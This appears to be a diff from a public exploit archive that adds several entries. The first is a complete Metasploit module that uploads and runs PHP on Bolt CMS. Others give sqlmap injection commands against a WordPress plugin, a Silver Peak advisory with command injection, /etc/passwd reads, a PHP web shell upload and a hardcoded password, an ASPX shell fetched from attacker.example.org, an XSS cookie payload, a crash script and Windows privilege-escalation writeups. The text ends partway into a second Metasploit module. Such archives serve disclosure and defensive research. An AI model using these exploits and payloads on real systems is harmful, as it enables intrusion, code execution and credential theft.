class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(
info,
'Name' => 'CMS Bolt File Upload Vulnerability',
'Description' => %q{
Bolt CMS contains a flaw that allows an authenticated remote
attacker to execute arbitrary PHP code. This module was
tested on version 2.2.4.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Tim Coen', # Vulnerability Disclosure
'Roberto Soares Espreto <robertoespreto[at]gmail.com>' # Metasploit Module
],
'References' =>
[
['URL', 'http://blog.curesec.com/article/blog/Bolt-224-Code-Execution-44.html']
],
'DisclosureDate' => 'Aug 17 2015',
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' => [['Bolt 2.2.4', {}]],
'DefaultTarget' => 0
))
register_options(
[
OptString.new('TARGETURI', [true, 'The base path to the web application', '/']),
OptString.new('FOLDERNAME', [true, 'The theme path to the web application (default: base-2014)', 'base-2014']),
OptString.new('USERNAME', [true, 'The username to authenticate with']),
OptString.new('PASSWORD', [true, 'The password to authenticate with'])
], self.class)
end
def check
cookie = bolt_login(username, password)
return Exploit::CheckCode::Detected unless cookie
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'bolt'),
'cookie' => cookie
)
if res && res.code == 200 && res.body.include?('Bolt 2.2.4</b>: Sophisticated, lightweight & simple CMS')
return Exploit::CheckCode::Vulnerable
end
Exploit::CheckCode::Safe
end
def username
datastore['USERNAME']
end
def password
datastore['PASSWORD']
end
def fname
datastore['FOLDERNAME']
end
def bolt_login(user, pass)
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'bolt', 'login')
)
fail_with(Failure::Unreachable, 'No response received from the target.') unless res
session_cookie = res.get_cookies
vprint_status("#{peer} - Logging in...")
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'bolt', 'login'),
'cookie' => session_cookie,
'vars_post' => {
'username' => user,
'password' => pass,
'action' => 'login'
}
)
return res.get_cookies if res && res.code == 302 && res.redirection.to_s.include?('/bolt')
nil
end
def get_token(cookie, fname)
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri, 'bolt', 'files', 'theme', fname),
'cookie' => cookie
)
if res && res.code == 200 && res.body =~ / name="form\[_token\]" value="(.+)" /
return Regexp.last_match[1]
end
nil
end
def rename_payload(cookie, payload, fname)
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'async', 'renamefile'),
'vars_post' => {
'namespace' => 'theme',
'parent' => fname,
'oldname' => "#{payload}.png",
'newname' => "#{payload}.php"
},
'cookie' => cookie
)
return true if res && res.code == 200 && res.body.include?('1')
nil
end
def exploit
vprint_status("#{peer} - Authenticating using #{username}:#{password}")
cookie = bolt_login(username, password)
fail_with(Failure::NoAccess, 'Unable to login. Verify USERNAME/PASSWORD or TARGETURI.') if cookie.nil?
vprint_good("#{peer} - Authenticated with Bolt.")
token = get_token(cookie, fname)
fail_with(Failure::Unknown, 'No token found.') if token.nil?
vprint_good("#{peer} - Token \"#{token}\" found.")
vprint_status("#{peer} - Preparing payload...")
payload_name = Rex::Text.rand_text_alpha_lower(10)
data = Rex::MIME::Message.new
data.add_part(payload.encoded, 'image/png', nil, "form-data; name=\"form[FileUpload][]\"; filename=\"#{payload_name}.png\"")
data.add_part("#{token}", nil, nil, 'form-data; name="form[_token]"')
post_data = data.to_s
vprint_status("#{peer} - Uploading payload...")
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri, 'bolt', 'files', 'theme', fname),
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => post_data,
'cookie' => cookie
)
fail_with(Failure::Unknown, 'Unable to upload payload.') unless res && res.code == 302
vprint_good("#{peer} - Uploaded the payload.")
rename = rename_payload(cookie, payload_name, fname)
fail_with(Failure::Unknown, 'No renamed filename.') if rename.nil?
php_file_name = "#{payload_name}.php"
payload_url = normalize_uri(target_uri.path, 'theme', fname, php_file_name)
vprint_status("#{peer} - Parsed response.")
register_files_for_cleanup(php_file_name)
vprint_status("#{peer} - Executing the payload at #{payload_url}.")
send_request_cgi(
'uri' => payload_url,
'method' => 'GET'
)
end
end

112
platforms/php/webapps/38187.txt Executable file
View file

@ -0,0 +1,112 @@
# Exploit Title: WordPress: cp-reservation-calendar 1.1.6 SQLi injection]
# Date: 2015-09-15
# Google Dork: Index of /wp-content/plugins/cp-reservation-calendar/
# Exploit Author: Joaquin Ramirez Martinez [ i0akiN SEC-LABORATORY ]
# Software Link: https://downloads.wordpress.org/plugin/cp-reservation-calendar.zip
# Version: 1.1.6
# OWASP Top10: A1-Injection
A vulnerability has been detected in the WordPress cp reservation calendar Plugin v1.6.
The vulnerability allows remote attackers to inject SQL commands.
The sql injection vulnerability is located in the `dex_reservations.php` file.
Remote attackers are able to execute own sql commands by manipulation of requested parameters.
The security risk of the sql injection vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 8.6.
Exploitation of the remote sql injection web vulnerability requires no user interaction or privilege web-application user account.
Successful exploitation of the remote sql injection results in database management system, web-server and web-application compromise.
============================
vulnerable function code...
============================
function dex_reservations_calendar_load2() {
global $wpdb;
if ( ! isset( $_GET['dex_reservations_calendar_load2'] ) || $_GET['dex_reservations_calendar_load2'] != '1' )
return;
@ob_clean();
header("Cache-Control: no-store, no-cache, must-revalidate");
header("Pragma: no-cache");
//following line is vulnerable...
$calid = str_replace (TDE_RESERVATIONCAL_PREFIX, "",$_GET["id"]);
$query = "SELECT * FROM ".TDE_RESERVATIONCALENDAR_DATA_TABLE." where ".TDE_RESERVATIONDATA_IDCALENDAR."='".$calid."'";
$row_array = $wpdb->get_results($query,ARRAY_A);
foreach ($row_array as $row)
{
$d1 = date("m/d/Y", strtotime($row[TDE_RESERVATIONDATA_DATETIME_S]));
$d2 = date("m/d/Y", strtotime($row[TDE_RESERVATIONDATA_DATETIME_E]));
echo $d1."-".$d2."\n";
echo $row[TDE_RESERVATIONDATA_TITLE]."\n";
echo $row[TDE_RESERVATIONDATA_DESCRIPTION]."\n*-*\n";
}
exit();
}
The following URL executes vulnerable function:
http://localhost/wordpress/?action=dex_reservations_calendar_load2&dex_reservations_calendar_load2=1&id=1
------------------------------------------------------------------------------------
POC using sqlmap tool::::
python sqlmap.py --url="http://localhost/wordpress/?action=dex_reservations_calendar_load2&dex_reservations_calendar_load2=1&id=1"
-p id --level=5 --risk=3 --dbms="MySQL" --dbs
##########################################################################
The following URL is too vulnerable
http://localhost/wordpress/?action=dex_reservations_check_posted_data
post parameters::::
-------------------------------------
dex_reservations_post=1&dex_item=1
------------------------------------
An unauthenticated user can use the following URL to inject malicious SQL code.
[dex_item] on POST parameter is vulnerable
======================
vulnerable code
=====================
is located in `dex_reservations.php`
function code..
function dex_reservations_get_option ($field, $default_value)
{
global $wpdb, $dex_option_buffered_item, $dex_option_buffered_id;
if ($dex_option_buffered_id == CP_CALENDAR_ID)
$value = $dex_option_buffered_item->$field;
else
{
$myrows = $wpdb->get_results( "SELECT * FROM ".DEX_RESERVATIONS_CONFIG_TABLE_NAME." WHERE id=".CP_CALENDAR_ID );
$value = $myrows[0]->$field;
$dex_option_buffered_item = $myrows[0];
$dex_option_buffered_id = CP_CALENDAR_ID;
}
if ($value == '' && $dex_option_buffered_item->calendar_language == '')
$value = $default_value;
return $value;
}
When this function is called the defined CP_CALENDAR_ID must contains an integer but it isn't validating the parameter
[ CP_CALENDAR_ID ]
----------------------------------------------------------------------------
POC using sqlmap tool::::
python sqlmap.py --url="http://localhost/wordpress/?action=dex_reservations_check_posted_data" --data="dex_reservations_post=1&dex_item=1"
-p dex_item --dbms="MySQL" --level=5 --risk=3
#############
time-line
2015-03-01: vulnerability found
2015-03-09: reported to vendor
2015-03-21-: released cp_reservation_calendar v1.1.7
2015-09-15: full disclosure

214
platforms/php/webapps/38197.txt Executable file
View file

@ -0,0 +1,214 @@
( , ) (,
. '.' ) ('. ',
). , ('. ( ) (
(_,) .'), ) _ _,
/ _____/ / _ \ ____ ____ _____
\____ \==/ /_\ \ _/ ___\/ _ \ / \
/ \/ | \\ \__( <_> ) Y Y \
/______ /\___|__ / \___ >____/|__|_| /
\/ \/.-. \/ \/:wq
(x.0)
'=.|w|.='
_=''"''=.
presents..
Silver Peak VXOA Multiple Vulnerabilities
Affected versions: Silver Peak VX < 6.2.11
PDF:
http://www.security-assessment.com/files/documents/advisory/Silverpeak-Advisory-Final.pdf
+-----------+
|Description|
+-----------+
The Silver Peak VX virtual appliance running VXOA before version 6.2.11
contains a number of security vulnerabilities, including command
injection, unauthenticated file read, mass assignment, shell upload, and
hardcoded credentials. By combining these vulnerabilities, an attacker
may remotely obtain root privileges on the underlying host.
+------------+
|Exploitation|
+------------+
==Command Injection==
A user with administrative access to the REST JSON interface of the VX
web server may execute arbitrary commands on the operating system. The
injection point lies in the "snmp" call, which does not sanitise the
"auth_key" parameter before including it in an executed command string.
The following command injection PoC writes the user's id to a file on
the filesystem.
[Command Injection PoC]
POST /rest/json/snmp HTTP/1.1
Host: [HOST]
Content-Type: application/json; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 368
Cookie: connect.sid=[VALID];
{"access":{"rocommunity":"public"},"listen":{"enable":true},"traps":{"trap_community":"public","enable":true},"auto_launch":true,"sysdescr":"",
"syscontact":"","syslocation":"","v3":{"users":{"admin":{"hash_type":"sha","auth_key":"a;echo
`id` >
/var/tmp/cmd_inj","self":"admin","privacy_key":"","privacy_type":"aes-128","enable":false}}},"encAuth":false,"encPri":false}
==Unauthenticated File Read==
A user with the ability to access the VX web server interface may make
an unauthenticated call to a web interface function that allows them to
read arbitrary files on the disk with the permission of the web server
user "apache". Two functions are affected by this vulnerability,
"save_file.php" and "save_config_file.php".
[Unauthenticated File Read PoC]
curl -sk
"https://[HOST]/6.2.5.0_52054/php/save_file.php?ftype=log&fname=../../etc/passwd"
OR
curl -sk
"https://[HOST]/6.2.5.0_52054/php/save_config_file.php?filename=../../../../../../../../etc/passwd"
==Mass Assignment==
A user with access to the REST JSON interface of the VX web server may
alter undocumented parameters of the "users" call, allowing them to
change a user's login shell to bash. This can be used to evade the
limited subshell enforced by the SSH server on the appliance.
[Mass assignment PoC]
POST /rest/json/users HTTP/1.1
Host: [HOST]
Content-Type: application/json; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 366
Cookie: connect.sid=[VALID];
{"users":{"basic":{"self":"basic","enable":true,"gid":0,"password":"[SNIP]","shell":"/bin/bash"}},[SNIP
other users]}}
==Shell Upload==
A user with monitor or administrative access to the web interface of the
VX web server may upload a PHP shell in order to execute arbitrary
commands as the web server user "apache". A POST request containing the
PHP shell is made to the "configdb_file.php" endpoint. This uploads the
shell to a directory with a randomly generated name corresponding to the
user's SOAP interface session. This random value may be obtained from
"home.php", and the uploaded shell accessed within that directory. The
following PoC details uploading the shell, obtaining the SOAP directory
name, and using the shell.
[Shell upload PoC]
POST /6.2.5.0_52054/php/configdb_file.php?seenform=1 HTTP/1.1
Host: [HOST]
Cookie: PHPSESSID=[VALID];
Content-Type: multipart/form-data;
boundary=---------------------------18932870311933452824851992207
Content-Length: 301
-----------------------------18932870311933452824851992207
Content-Disposition: form-data; name="userfile"; filename="shell.php"
Content-Type: text/html
<?php
$cmd = $_GET["cmd"];
$output = shell_exec($cmd);
echo "$output";
?>
-----------------------------18932870311933452824851992207
#End of request
$curl -sk -b 'PHPSESSID=[VALID]'
"https://[HOST]/6.2.5.0_52054/php/home.php" | grep "flowFile"
var flowFile =
"/opt/tms/lib/web/content/webui/php/temp/soap/wcupfu36lkvkyutxc2h1swnxsnz8rsffijnhod9zmwr270oreuoatajxcfq71sf/";
$curl -sk
"https://[HOST]/6.2.5.0_52054/php/temp/soap/wcupfu36lkvkyutxc2h1swnxsnz8rsffijnhod9zmwr270oreuoatajxcfq71sf/shell.php?cmd=id"
uid=48(apache) gid=48(apache) groups=48(apache)
==Hardcoded Account==
The "spsadmin" account is predefined in the VX appliance, and is hidden
from user account lists in the web and subshell interfaces. The account
has a hardcoded password of "Silverpeak123", and cannot be logged into
through the regular web interface, or the subshell over SSH. However,
the account can log in via the web JSON interface, and execute JSON API
calls with administrative privileges. This can include creating new
users, with which an attacker may successfully log into the SSH or web
interfaces, and also exploiting the Command Injection bug detailed
earlier in this advisory. The following PoC details the request and
credentials used to obtain a valid REST cookie:
[Hardcoded account login PoC]
POST /rest/json/login HTTP/1.1
Host: [host]
Content-Type: application/json; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 46
{"user":"spsadmin","password":"Silverpeak123"}
==Subshell Breakout==
An administrative user with access to the enable menu of the login
subshell may enter a hardcoded string to obtain a bash shell on the
operating system.
[Subshell Breakout POC]
silverpeak > en
silverpeak # _spsshell
[admin@silverpeak root]# id
uid=0(admin) gid=0(root) groups=0(root)
+----------+
| Solution |
+----------+
Users of the 6.2.x branch should upgrade to version 6.2.11 of VXOA in
order to protect against these issues. Silver Peak has advised that
users of the 7.2.x branch are only vulnerable to the command injection
vulnerability, which will be patched in version 7.3.
+-------------------+
|Disclosure Timeline|
+-------------------+
01/04/2015 - Email sent to info address asking for a security contact.
09/04/2015 - Email sent to info and security addresses asking for a
security contact.
21/04/2015 - Email sent to CEO regarding security contact.
21/04/2015 - Response from CEO providing security contact details.
22/04/2015 - Email sent to security contact asking for PGP key.
22/04/2015 - Received PGP key, sent advisory.
22/04/2015 - Email received confirming receipt of advisory.
22/06/2015 - Email sent asking for update on advisory.
23/06/2015 - Vendor details fixes in place, states that all issues have
been fixed in 6.2.11.0, and only the command injection remains unfixed
in the 7.2.x version.
17/07/2015 - Email sent regarding resolution of unfixed issue.
17/07/2015 - Received response stating the command injection issue is
only relevant to customers who have disabled shell access.
21/07/2015 - Email sent asking for clarification on the vendor stance.
21/07/2015 - Vendor states command injection vulnerability is only an
issue for customers with shell access disabled as they otherwise have
the ability to execute commands through the shell, and that the issue
will be fixed in release 7.3.
09/09/2015 - Public advisory release.
+-----------------------------+
|About Security-Assessment.com|
+-----------------------------+
Security-Assessment.com is a leading team of Information Security
consultants specialising in providing high quality Information Security
services to clients throughout the Asia Pacific region. Our clients
include some of the largest globally recognised companies in areas such
as finance, telecommunications, broadcasting, legal and government. Our
aim is to provide the very best independent advice and a high level of
technical expertise while creating long and lasting professional
relationships with our clients.
Security-Assessment.com is committed to security research and
development, and its team continues to identify and responsibly publish
vulnerabilities in public and private software vendor's products.
Members of the Security-Assessment.com R&D team are globally recognised
through their release of whitepapers and presentations related to new
security research.
For further information on this issue or any of our service offerings,
contact us:
Web www.security-assessment.com
Email info () security-assessment.com
Phone +64 4 470 1650

27
platforms/php/webapps/38204.txt Executable file
View file

@ -0,0 +1,27 @@
source: http://www.securityfocus.com/bid/57242/info
Prizm Content Connect is prone to an arbitrary file-upload vulnerability because it fails to adequately validate files before uploading them.
An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in an arbitrary code execution within the context of the vulnerable application.
Prizm Content Connect 5.1 is vulnerable; other versions may also be affected.
Proof of concept
First, the attacker causes the Prizm Content Connect software to download
the malicious ASPX file:
http://www.example.com/default.aspx?document=http://attacker.example.org/aspxshell.aspx
The resulting page discloses the filename to which the ASPX file was
downloaded, e.g.:
Document Location: C:\Project\
Full Document Path: C:\Project\ajwyfw45itxwys45fgzomrmv.aspx
Temp Location: C:\tempcache\
The attacker then requests the ASPX shell from the root of the website:
http://www.example.com/ajwyfw45itxwys45fgzomrmv.aspx

12
platforms/php/webapps/38207.txt Executable file
View file

@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/57254/info
Quick.Cms and Quick.Cart are prone to a cross-site scripting vulnerability because they fail to sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
The following products are vulnerable:
Quick.Cms 5.0
Quick.Cart 6.0
http://www.example.com/admin.php/')"></select><script>alert(document.cookie);</script>/

9
platforms/php/webapps/38209.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/57256/info
The Gallery plugin for WordPress is prone to an arbitrary file-access vulnerability.
Remote attackers can exploit this issue to read arbitrary files. This may lead to further attacks.
Gallery 3.8.3 is vulnerable; other versions may also be affected.
http://www.example.com/wp-content/plugins/gallery-plugin/gallery-plugin.php?filename_1=[AFR]

41
platforms/windows/local/38185.txt Executable file
View file

@ -0,0 +1,41 @@
'''
********************************************************************************************
# Exploit Title: Total Commander 32bit SEH Overwrite.
# Date: 8/27/2015
# Exploit Author: Un_N0n
# Software Vendor: http://www.ghisler.com/
# Software Link: http://www.ghisler.com/download.htm
# Version: 8.52
# Tested on: Windows 8 x64(64 BIT)
********************************************************************************************
[Info:]
EAX 00106541
ECX FFFFFEFA
EDX 0031E941
EBX 04921F64
ESP 001065FC
EBP 41414141
ESI 04930088
EDI 0031E9B0
EIP 41414141
SEH chain of main thread, item 0
Address=001065FC
SE handler=41414141
'''
[Steps to Produce the Crash]:
1- Open up 'TOTALCMD.EXE'.
2- Goto Files -> Change Attributes.
3- In time field paste in contents of 'Crash.txt'.
~ Software will crash b/c SEH Overwrite.
[Code for CRASH.txt]
file = open("crash.txt",'w')
file.write("A"*5000)
file.close()
->After Reporting,
Vendor has released(bugfix release) a new version(8.52a[9th SEPT 2015]).
**********************************************************************************************

39
platforms/windows/local/38198.txt Executable file
View file

@ -0,0 +1,39 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=468
Windows: User Mode Font Driver Thread Permissions EoP
Platform: Windows 10 Build 10130
Class: Elevation of Privilege
Summary:
The host process for the UMFD runs as a normal user but with a heavily restrictive process DACL. Its possible execute arbitrary code within the context of the process because its possible to access the processes threads leading to local EoP.
Description:
NOTE: This was tested on the latest available build on Windows 10. I dont know if the final version will change the functionality to fix this vulnerability.
When a custom font is used in Windows 10 the User Mode Font Driver comes into play. This is initialized by a call from the kernel into the user sessions winlogon process which in turn spawns a new copy of fontdrvhost.exe. The process is started inside an appcontainer heavily restricting what resources it could access if a font bug was able to compromise it. However win32k exposes some additional calls to the UMFD for its own purposes, some of which are potentially dangerous. For that reason (presumably) winlogon creates the process with a specific DACL limiting access to the process and initial thread to SYSTEM only.
Theres a few problems with this approach, firstly its still running in the context of the user and includes the users environment variables such as PATH. This might mean if any badly written code later relies on the drive mapping or PATH there could be issues. More serious however is the specified DACL only applies to the process object and the initial thread object, but not to any subsequent thread. Therefore those threads get the default DACL from the process token (which is never changed) and are marked as owned by the current user, so the DACL could be rewritten anyway. This is a problem as with write access to the threads its possible to change their context and redirect execution to an arbitrary location. As the token is a lowbox token this can even be done in low integrity processes such as IE PM.
The exploitation is made trickier by the fact that you cant directly read or write the process memory. Still one thing you could do is redirect the thread to LoadLibraryW and pass it the known address of a string. This can either be a string in a loaded library and rely on the path environment variable to allow it to be resolved or in something like the GDI heap.
Once in the UMFD process you can then send some of the specific Win32k escape codes. For example theres one currently called UmfdEscEngCreateFile which will open (for read or write) a couple of files in system32. The open is done in kernel mode, with no forced access check (even though an impersonation is performed) and the handle returned to user mode. This is dangerous for a number of reasons, specifically that the NTFS driver will mark the file as having create symbolic link permissions because its opened in kernel mode which means the caller could set a file symbolic link. Then it could reopen the file and it would be able create an arbitrary file on disk. This hasnt been completely tested however but its an example of a dangerous call, of course it could just be a vestigial feature which will be removed in release builds as the code is pretty dangerous and doesnt even work as expected.
This issue could probably be fixed in a few ways, firstly the default token DACL should be set so that it maintains the security, assuming this is possible. Also youd probably need to set OWNER_RIGHTS SID otherwise the user could just open the thread and rewrite its DACL. Also not using the actual users environment would probably be a good idea although not necessarily a complete fix. Finally presumably the process mitigation to only allow signed modules could be enabled which would complicate exploitation especially in the presence of CFG.
Proof of Concept:
Ive provided a PoC which just crashes the fontdrvhost process at a predictable address. Its only built for 32 bit version of Windows 10 but presumably it would work on 64 bit version as well. The password for the archive is "password".
1) Copy the PoC to a directory
2) Execute the PoC, if it wasnt already a new instance of fontdrvhost.exe should have started. You might want to attach a debugger at this point.
3) Click the Do Exploit button, if at this point the fontdrvhost process doesnt crash open a new copy of the PoC just to kick the threads inside the process.
Expected Result:
Its not possible to influence the fontdrvhost process.
Observed Result:
Thread execution redirected to an arbitrary address of 0x55555555.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38198.zip

38
platforms/windows/local/38199.txt Executable file
View file

@ -0,0 +1,38 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=461
Windows: NtUserGetClipboardAccessToken Token Leak Redux
Platform: Windows 8.1 Update, Windows 10 Build 10130
Class: Security Bypass/EoP
Summary:
The NtUserGetClipboardAccessToken win32k system call exposes the access token of the last user to lower-privileged users. It can also be used to open an anonymous impersonation thread token which normally OpenThreadToken shouldn't be able to do. This is a bypass of the fix for CVE-2015-0078.
Description:
This was supposedly fixed as CVE-2015-0078 in MS15-023 to prevent access to the token from any process running below medium IL. The check is roughly:
if(IsImmersiveBroker() || CheckAccessForIntegrityLevelEx(0x2000)) {
ObOpenObjectByPointer(WinStationObject->ClipboardAccessToken, Access, TokenHandle);
}
This is possible to bypass because IsImmersiveBroker level is trivial to get. It seems Win32k sets the appropriate Win32Process flag when first initializing the process and converting it to a GUI thread. If the executable is signed by a Microsoft certificate and has a specially named section of “.imrsiv” the flag will be set, however this will be done regardless of the IL of the process. Therefore you can create a process using one of the pre signed executables, such as explorer.exe, RuntimeBroker.exe or LicensingUI.exe then inject a DLL into the process. This allows you to bypass the check and capture the token.
Ive had a quick look at what else might be exploitable from being able to get IsImmersiveBroker to return true. Nothing stands out but its probably worth restricted the IL level of processes allowed to get this flag set.
Proof of Concept:
Ive provided a PoC which will capture any token currently on the clipboard that it can access. It creates an instance of LicensingUI.exe and injects a DLL into it. Note the built executables are for x64 Windows, you'll need to rebuild to test on 32 bit. The password for the archive is "password".
1) Copy the PoC to a directory, including the executable and the DLL
2) Execute the Poc_NtUserGetClipboardAccessToken_SecurityBypass.exe as a low integrity process. You can do this by marking the executable file with low IL using icacls or by using psexec.
3) Perform a clipboard operation, for example select some text and copy it to the clipboard
4) The PoC should show it has opened a token by opening a message dialog, if you inspect the tokens its likely to show a primary token has been captured with medium IL.
Expected Result:
It shouldnt be possible to capture the token.
Observed Result:
The token was captured in the low IL process.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38199.zip

32
platforms/windows/local/38200.txt Executable file
View file

@ -0,0 +1,32 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=442
Windows: Task Scheduler DeleteExpiredTaskAfter File Deletion Elevation of Privilege
Platform: Windows 8.1 Update, looks like it should work on 7 and 10 as well
Class: Elevation of Privilege
Summary:
The Task Scheduler can be made to delete a task after its trigger has expired. No check is made to ensure the task file is not a junction which allows arbitrary files to be deleted by the system user leading to EoP.
Description:
If a scheduled task is configured with DeleteExpiredTaskAfter setting the service will delete the task including its task file after the triggers have expired. It does the deletion in a timer callback thread but doesnt call DeleteFile with the privileges of the task, instead running at local system. While the scheduler now seems to do some checking on the path for junction attacks this only seems to be at creation time not when its deleting the task file. Therefore you can mount a junction attack against the deletion process which allows you to delete any file or directory on the system which local system can delete. To delete directories youd have to use a more advanced trick than just a directory junction as youd need to the point the task file to name::$INDEX_ALLOCATION but it will work.
The ability to deletes files is sufficient in some cases to elevate privileges because of the behaviour of other system processes and default permissions. For example system files created in ProgramData generally have privileges which prevent a user from modifying or replacing files, but not from creating new ones. You could use the attack to delete existing files then replace with hardlinks to overwrite system files.
Proof of Concept:
The PoC demonstrates the vulnerability deleting an arbitrary file from the system. You need to modify the $filetodelete variable to select a different file to test other than c:\protected\test
1) Copy the PoC to a location on a local hard disk and rename the files extension to .ps1.
2) Enable powershell scripting for the current user, this doesnt affect the actual exploit, its just to get powershell to execute the script.
2) As a normal user execute the powershell PoC
3) The PoC should complete execution.
Expected Result:
The service should detect the directory junction and not delete the target file
Observed Result:
The target file is deleted
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38200.ps1

38
platforms/windows/local/38201.txt Executable file
View file

@ -0,0 +1,38 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=439
Windows: CreateObjectTask TileUserBroker Elevation of Privilege
Platform: Windows 8.1 Update (I dont believe its available in earlier Windows versions)
Class: Elevation of Privilege
Summary:
The CreateObjectTask scheduled task initializes a user accessible system COM service which allows you to instantiate the TileUserBroker COM object. This object doesnt take into account the caller when writing and deleting files leading to EoP.
Description:
The Microsoft\Windows\Shell\CreateObjectTask initializes a shell32 based ICreateObject COM server as local system. This is marked as being accessible from a normal user account so once created we can attach to it. The server only has one method, CreateObject which checks the CLSID against a list of known safe classes before allowing it to be instantiated. One of these classes is allows a user to set their account picture for the logon screen.
By calling CUserTileBroker::SetUserTile (implemented in Windows.UI.Immersive.dll) we can get the system service to write the account pictures to c:\users\public\AccountPictures\SID. Once the files are written it will try and delete any file not expected in that folder, this is done as the system user. We can abuse this functionality by placing a junction where the SID component is and point it to an arbitrary location. This would allow us to delete arbitrary files on the system or potentially replace a file with the one of the JPEGs (which are reencoded). Replacing files is trickier as the file names have a random GUID attached, however the service writes 5 files, so theres a race condition where the GUID could be read from one of those files then used to redirect the writes. Also the rencoding might make it difficult to inject any meaningful content.
If a user has not configured an account picture before (which probably means only local/domain users rather than Microsoft accounts) then the folder c:\users\public\AccountPictures\SID doesnt exist. Even if another user has set their picture on the same machine the AccountPictures directory has sufficient permissions to add a new directory in its place. If the user has configured their account picture then this will not work as the directory permissions of the SID directory are very restrictive.
The ability to deletes files is sufficient in some cases to elevate privileges because of the behaviour of other system processes and default permissions. For example system files created in ProgramData generally have privileges which prevent a user from modifying or replacing files, but not from creating new ones. You could use the attack to delete existing files then replace with hardlinks to overwrite system files.
Proof of Concept:
The PoC demonstrates the vulnerability deleting the file contents of an arbitrary directory passed on the command line. The password for the 7z file is password.
1) Extract the PoC to a location on a local hard disk
2) As a normal user execute the PoC pass the path to the directory to delete as the first parameter. For example poc.exe c:\windows\temp
3) The PoC should complete execution.
NOTE: If Access Denied is printed then its probably that the account picture has already been setup on the machine which makes the exploit not work.
Expected Result:
The system service should determine that it cannot delete the contents of the picture directory
Observed Result:
The passed path has all its files deleted (assuming they can be accessed by local system).
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38201.zip

35
platforms/windows/local/38202.txt Executable file
View file

@ -0,0 +1,35 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=437
Windows: CreateObjectTask SettingsSyncDiagnostics Elevation of Privilege
Platform: Windows 8.1 Update (I dont believe its available in earlier Windows versions)
Class: Elevation of Privilege
Summary:
The CreateObjectTask scheduled task initializes a user accessible system COM service which allows you to instantiate the SettingsSyncDiagnostics COM object. This object doesnt take into account the caller when copying logs files leading to EoP.
Description:
The Microsoft\Windows\Shell\CreateObjectTask initializes a shell32 based ICreateObject COM server as local system. This is marked as being accessible from a normal user account so once created we can attach to it. The server only has one method, CreateObject which checks the CLSID against a list of known safe classes before allowing it to be instantiated. One of these classes is a diagnostic class for setting synchronization implemented in SettingSync.dll.
This class allows an event log to be initialized with the StartLogging method and then the logs copied to an arbitary location with the StopLogging method. The StopLogging method doesnt impersonate the caller when moving the logs to the user defined location which means it runs as local system. Its possible to use this to copy the log files to arbitrary locations using appropriate symbolic link attacks. We can get data into the log file by sending trace events to the appropriate provider, this could allow string data to be added to the file. The name of the file is under attacker control so it can be renamed to .hta or .ps1 which would allow the limited control over the contents to be abused in error tolerant script engines.
Another way of exploiting this takes into account that the SHFileOperations call which moves the file resets the ACLs (where applicable) on the file to match the expected inherited permissions. So for example you could drop the file as c:\program.exe and it would pick up the default DACL for C:\ (which allows Authenticated Users modify permissions) but the call doesnt reapply the High IL label. This could be used indirectly in bad system services with unquoted file paths as the normal user could re-write the files contents to an malicious executable. A second trick with this is theres a race between the move and the resetting of the ACLs. As the shell uses TreeSetNamedSecurityInfo it will also walk directory hierarchies, therefore by switching the symlink from the original target to a directory (say c:\users) you can force parts of the system drive to reset their ACLs, leading to the user being able to modify new parts of the file system which again could be exploited..
Exploitation is complicated somewhat by a bug in the proxy in actxprxy.dll. Presumably in the original MIDL file for the COM object the StopLogging method is incorrectly marked, the single WCHAR* parameter is missing the [string] attribute. This results in the built-in proxy only marshalling a single WCHAR to the server, this tends to cause things to not work so well and leads to a limited information disclosure as whatevers after the single character in memory up to the next NUL is assumed to be part of the path. Fortunately the stub is sufficiently simple that by sending a plain array buffer to the server itll pick up the correct data. Ive done this in the PoC by implementing my own custom COM proxy object.
Proof of Concept:
The PoC demonstrates the vulnerability by copying the log file to the system drive. The password for the 7z file is password.
1) Extract the PoC to a location on a local hard disk
2) As a normal user execute the PoC.
3) The PoC should complete execution.
Expected Result:
The log file should fail to be moved to the specified target.
Observed Result:
The log file ends up copied to c:\program.exe and can be modified by the current user.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38202.zip

72
platforms/windows/remote/38195.rb Executable file
View file

@ -0,0 +1,72 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::FILEFORMAT
include Msf::Exploit::EXE
include Msf::Exploit::Remote::SMB::Server::Share
def initialize(info={})
super(update_info(info,
'Name' => "MS15-100 Microsoft Windows Media Center MCL Vulnerability",
'Description' => %q{
This module exploits a vulnerability in Windows Media Center. By supplying
an UNC path in the *.mcl file, a remote file will be automatically downloaded,
which can result in arbitrary code execution.
},
